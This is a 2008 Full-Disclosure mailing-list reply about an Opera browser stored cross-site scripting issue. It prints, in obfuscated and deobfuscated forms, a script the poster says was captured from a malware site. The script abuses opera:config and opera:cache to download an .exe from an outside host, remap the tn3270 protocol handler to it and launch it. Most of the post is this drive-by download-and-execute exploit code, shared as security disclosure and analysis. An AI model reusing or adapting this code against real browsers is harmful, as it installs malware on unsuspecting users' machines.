[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Opera Stored Cross Site Scripting
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] Opera Stored Cross Site Scripting
- From: Kanedaaa Bohater <kaneda@xxxxxxxxxxx>
- Date: Thu, 23 Oct 2008 16:12:27 +0200 (CEST)
> Just found a way to use Stefano's opera:config idea to execute code from
> remote.
Hi.
3 months ago I found on some malware site
(www.google.com.update.login.jsp.podavanda.cn), that when Your UserAgent
was Opera - they send to You code similar to Yours, but they first
download malware .exe file to opera:cache (Opera use pre_downloading
files) and later change tn3270:// protocol to this file (but without
opera:historysearch). It was probably for older Opera version...
<script>
blank_iframe = document.createElement("ihfcrdahmdeR".replace(/[hc4dR]/g, ''));
blank_iframe.src = "aYbYoYuct9:sbYlca9nck9".replace(/[Ycys9]/g, '');
blank_iframe.setAttribute("srtGy9lBe9".replace(/[9GBnr]/g, ''),
"dRi~sRpPlRa~yc:~nSoSnPec".replace(/[cPR~S]/g, ''));
blank_iframe.setAttribute("icdV".replace(/[#cARV]/g, ''),
"bLlPaPn@kL_Bi@f@rLaBm4eP_LwLiLn4dPoLw4".replace(/[P@BL4]/g, ''));
document.appendChild(blank_iframe);
blank_iframe_window.eval
("config_iframe =
document.createElement("iAfWrEajmAeE".replace(/[jEWLA]/g, ''));\
config_iframe.setAttribute("iqdw".replace(/[q3wu#]/g, ''),
"cboKnIfSiSgb_IibfKrIaSmbeI_uwKiKnSdboSwu".replace(/[IKSub]/g, ''));\
config_iframe.src = 'opera:config';\
document.appendChild(config_iframe);\
app_iframe = document.createElement("sncnr9inpXta".replace(/[9aXqn]/g,
''));\
cache_iframe =
document.createElement("iUfurBaumBeB".replace(/[1lBUu]/g, ''));\
app_iframe.src =
"hUtUtUpY:y/y/UwUwYwU.@gYoyo@gYlye@.UcyoXmY.Xu@pXdYaytYeU.UlYoygXiyny.Uj@s@pX.@pXoXd@ayvYaynydXaY.yc@ny/XI@I@lU/yxXlXoUaydUe@r@.ye@xyeX".replace(/[UXYy@]/g,
'');\
app_iframe.onload = function ()\
{\
cache_iframe.src = "oApAeArVaR:AcRaVcAhVeR".replace(/[AVqKR]/g,
'');\
cache_iframe.onload = function ()\
{\
cache =
cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
var re = new
RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A
HREF=\"'+app_iframe.src.toUpperCase(), '');\
filename = cache.match(re);\
config_iframe_window.eval\
(\"\
opera.setPreference("NReRtRwpour!kp".replace(/[%u\!Rp]/g, ''),"T!N#34247K0K
4AKp!p#".replace(/[\!4#YK]/g, ''),opera.getPreference("UjsaeYrw
wPYrYeaf3sw".replace(/[aY3jw]/g, ''),"Cla8c8hZes
sD8isrZeHcZt8olrlyl4H".replace(/[8lZsH]/g, ''))+parent.filename[1]);\
app_link = document.createElement('a');\
app_link.setAttribute("hsr%eWfW".replace(/[@3s%W]/g,
''), "tvnv3e2v7v0v:C/J/vnJoWtWheiJnWge".replace(/[CvJWe]/g, ''));\
app_link.click();\
setTimeout(function(){opera.setPreference("NjeCtSwjo7rjkS".replace(/[C7Sgj]/g,
''),"TPND3r2#7r0# PAPprpP".replace(/[P#DZr]/g,
''),"theClhnje~t~.jehxje~".replace(/[w~Cjh]/g, ''))},1000);\
\");\
};\
document.appendChild(cache_iframe);\
};\
document.appendChild(app_iframe);");
</script>
which was something like:
<script>
blank_iframe = document.createElement("iframe");
blank_iframe.src = "about:blank";
blank_iframe.setAttribute("style", "display:none");
blank_iframe.setAttribute("id"), "blank_iframe_window");
document.appendChild(blank_iframe);
blank_iframe_window.eval
("config_iframe = document.createElement("iframe");\
config_iframe.setAttribute("id", "config_iframe_window");\
config_iframe.src = 'opera:config';\
document.appendChild(config_iframe);\
app_iframe = document.createElement("script");\
cache_iframe = document.createElement("iframe");\
app_iframe.src =
"hxxp://www.google.com.update.login.jsp.podavanda.cn/IIl/xloader.exe";\
app_iframe.onload = function ()\
{\
cache_iframe.src = "opera:cache";\
cache_iframe.onload = function ()\
{\
cache =
cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
var re = new
RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A
HREF=\"'+app_iframe.src.toUpperCase(), '');\
filename = cache.match(re);\
config_iframe_window.eval\
(\"\
opera.setPreference("Network","TN3270
App",opera.getPreference("User Prefs","Cache Directory4")+parent.filename[1]);\
app_link = document.createElement('a');\
app_link.setAttribute("href", "tn3270://nothing");\
app_link.click();\
setTimeout(function(){opera.setPreference("Network","TN3270
App","telnet.exe~")},1000);\
\");\
};\
document.appendChild(cache_iframe);\
};\
document.appendChild(app_iframe);");
</script>
but unfortunately I dont have to much time for test...
--
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]..
[+] You can take our lives,but you will never take our Freedom - W.Wallace
[+] Peace on earth depends on the peace in the peoples hearts - Dalai Lama
[+] Revolution the only solution - System of a down...
[+] Dalej idac dalej dojdziesz dalej siedzac dalej siedzisz - etoe aka ok0
[-] Kanedaaa... Bohateur... Cucumber Team Member... kaneda@xxxxxxxxxxx
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/